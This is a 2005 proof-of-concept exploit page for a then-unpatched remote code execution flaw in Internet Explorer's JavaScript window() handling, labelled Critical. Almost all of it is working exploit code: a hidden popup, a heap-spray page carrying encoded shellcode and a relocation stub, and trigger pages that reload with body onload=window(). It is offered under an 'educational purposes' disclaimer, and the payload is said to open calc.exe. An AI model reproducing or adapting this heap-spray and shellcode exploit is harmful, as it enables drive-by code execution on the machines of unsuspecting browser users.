exploits , vulnerabilities , articles , Microsoft Internet Explorer "Window()" Remote Code Execution Exploit (0day)

Rated as : Critical 
Status : Unpatched

<!-- 
Computer Terrorism (UK)

============================================

Microsoft Internet Explorer JavaScript Window() - Proof Of Concept

============================================

Author:
--------

Stuart Pearson
Computer Terrorism (UK)
www.computerterrorism.com
21st November, 2005


THE FOLLOWING PROOF OF CONCEPT IS PROVIDED EXCLUSIVELY FOR EDUCATIONAL 
PURPOSES ONLY, AND IS PROVIDED "AS IS", WITHOUT ANY EXPRESS OR
IMPLIED 
WARRANTY. IN PARTICULAR, NEITHER THE AUTHOR NOR COMPUTER TERRORISM 
MAKES ANY REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE FITNESS 
OF THIS CODE FOR ANY PARTICULAR PURPOSE.

PERMISSION TO USE, COPY, PRINT, AND DISTRIBUTE THIS DOCUMENT FOR
EDUCATIONAL 
PURPOSES IS HEREBY GRANTED, PROVIDED THAT THE TEXTUAL CONTENT REMAINS
INTACT 
AND UNMODIFIED.
-->

<html>

<head>
<meta http-equiv="Content-Language"
content="en-gb">
<meta http-equiv="Content-Type" content="text/html;
charset=windows-1252">
<title>Computer Terrorism - Microsoft Internet Explorer Proof of
Concept</title>
<script type="text/javascript">

function runpoc(iframecount)
{

document.getElementById('table1').rows[2].cells[0].innerHTML="<p
align=center><B>
<font color=#339966 size=1
face=Arial>    loading, please wait....
</font></p>"
document.getElementById('table1').rows[4].cells[0].innerHTML=""
document.getElementById('table1').rows[6].cells[0].innerHTML=""
document.getElementById('table1').rows[7].cells[0].innerHTML=""
document.getElementById('table1').rows[9].cells[0].innerHTML=""


top.consoleRef = open('blankWindow.htm','BlankWindow',
'width=1,height=1'
+',menubar=0'
+',toolbar=1'
+',status=0'
+',scrollbars=0'
+',left=1'
+',top=1'
+',resizable=0')

top.consoleRef.blur();

top.consoleRef.document.writeln(
'<html>'
+'<head>'
+'<title>CT</title>'
+'</head>'
+'<body onBlur=self.blur()>'
+'</body></html>'
)

self.focus() // Ensure the javascript prompt boxes are hidden in the
background


for (i=1 ; i <=iframecount ; i++)
{ 
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0
frameborder=0 
src=fillmem.htm></iframe>')
}

if( iframecount == 8 ){
//alert('8');
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0
frameborder=0 
src=bug2k.htm></iframe>')
}

if( iframecount == 4 ){
//alert('4');
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0
frameborder=0 
src=bug.htm></iframe>')
}

//+'<iframe width=1 height=1 border=0 frameborder=0
src=bug.htm></iframe>'
//)



}
</script>
</head>

<body
onLoad="self.moveTo(0,0);self.resizeTo(screen.width,screen.height);">

<p> </p>
<p> </p>

<table border="0" width="100%"
id="table1">
<tr>
<td>
<p align="center"><font
color="#333333"><b><font size="1"
face="Arial">
Microsoft Internet Explorer JavaScript Window() Proof of
Concept</font></b>
</font></td>
</tr>

<tr>
<td width="98%" height="15">
<p align="center"><b><font face="Arial"
size="1" color="#333333">Select 
your operating system:-</font></b></td>
</tr>
<tr>
<td width="98%" height="10"></td>
</tr>
<tr>
<td width="98%" height="27"
align="center">
<p><b><font color="#339966" size="1"
face="Arial">
-</font><font color="#333333"><font
color="#333333" size="1" face="Arial">
</font> </font>
<font color="#333333" size="1"
face="Arial"><a href="#"
onclick="javascript:runpoc(4)">
<span style="text-decoration: none"><font
color="#333333">Microsoft 
Windows XP (All Service Packs)</font></span></a><font
color="#333333"> </font></font>
<font color="#339966" size="1"
face="Arial"> -</font></b></td>
</tr>
<tr>
<td width="98%" height="22"
align="center">
<p><b><font color="#339966" size="1"
face="Arial">
-</font><font color="#333333"><font
color="#333333" size="1" face="Arial">
</font> </font>
<font color="#333333" size="1"
face="Arial"><a href="#"
onclick="javascript:runpoc(8)">
<span style="text-decoration: none"><font
color="#333333">Microsoft 
Windows 2000/Universal
(Slower)</font></span></a><font
color="#333333"> </font></font>
<font color="#339966" size="1"
face="Arial"> -</font></b></td>
</tr>
<tr>
<td width="98%" height="15"
align="center">
</td>
</tr>
<tr>
<td width="98%" height="15"
align="center">
<b><font color="#339966" face="Arial"
size="1">invokes calc.exe if 
successful</font></b></td>
</tr>
</table>

</body>
</html>

--------------------------------------------------------------------------------------------------------------

<-- blankWindow.htm -->

<HTML>
<TITLE>Blank Window</title>
<body></body>
</html>

--------------------------------------------------------------------------------------------------------------

<--    fillmem.htm   -->

<HTML>
<HEAD>
<Script Language="JavaScript">
function load() {

var spearson=0
var eip = ""
var prep_shellcode = ""
var shellcode = ""
var fillmem = ""


//
// Address called by the bug (also serves as slide code)
//
for (spearson=1 ; spearson <=500 ; spearson++)
{ 
eip = eip + unescape("%u7030%u4300")
//eip = eip + unescape("%u4300")
}


//
// Create a large chunk for memory saturation
//
for (spearson=1 ; spearson <=200; spearson++) 
{ 
fillmem = fillmem + eip
}

//
// Search for our shellcode (tagged with my initials) and copy to a more
stable area
//
prep_shellcode =
unescape("%u9090%uBA90%u4142%u4142%uF281%u1111%u1111%u4190" +
"%u1139%uFA75%u9090%uF18B%uF88B%u9057%uc933%ub966" +
"%u002d%ua5F3%u9090%u905f%ue7ff")

//
// Harmless Calc.exe
//
shellcode =
unescape("%u5053%u5053%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF")


fillmem = fillmem + prep_shellcode + shellcode

prompt(fillmem,"Computer Terrorism (UK) Ltd - Internet Explorer
Vulnerability")

}
// -->
</Script> 
</head>
<TITLE>Windows Explorer Exploit</TITLE>
<body onload="setTimeout('load()',2000)">
test test test
</body>
</html>

--------------------------------------------------------------------------------------------------------------

<--    bug2k.htm   -->

<html>
<TITLE>Crash2</title>
<body onload="setTimeout('main()',20000)">

<SCRIPT>

function main()
{

document.write("<TITLE>hello2</TITLE>")
document.write("<body onload=window();>")

window.location.reload()

}
</SCRIPT>
<br><br><br><br><br><br><center><FONT
FACE=ARIAL SIZE 12PT>Please Wait !
</FONT></center>


--------------------------------------------------------------------------------------------------------------

<--    bug.htm   -->

<html>
<TITLE>Crash2</title>
<body onload="setTimeout('main()',6000)">

<SCRIPT>

function main()
{

document.write("<TITLE>hello2</TITLE>")
document.write("<body onload=window();>")

window.location.reload()

}
</SCRIPT>
<br><br><br><br><br><br><center><FONT
FACE=ARIAL SIZE 12PT>Please Wait !
</FONT></center>
securitydot.net - 2005-11-21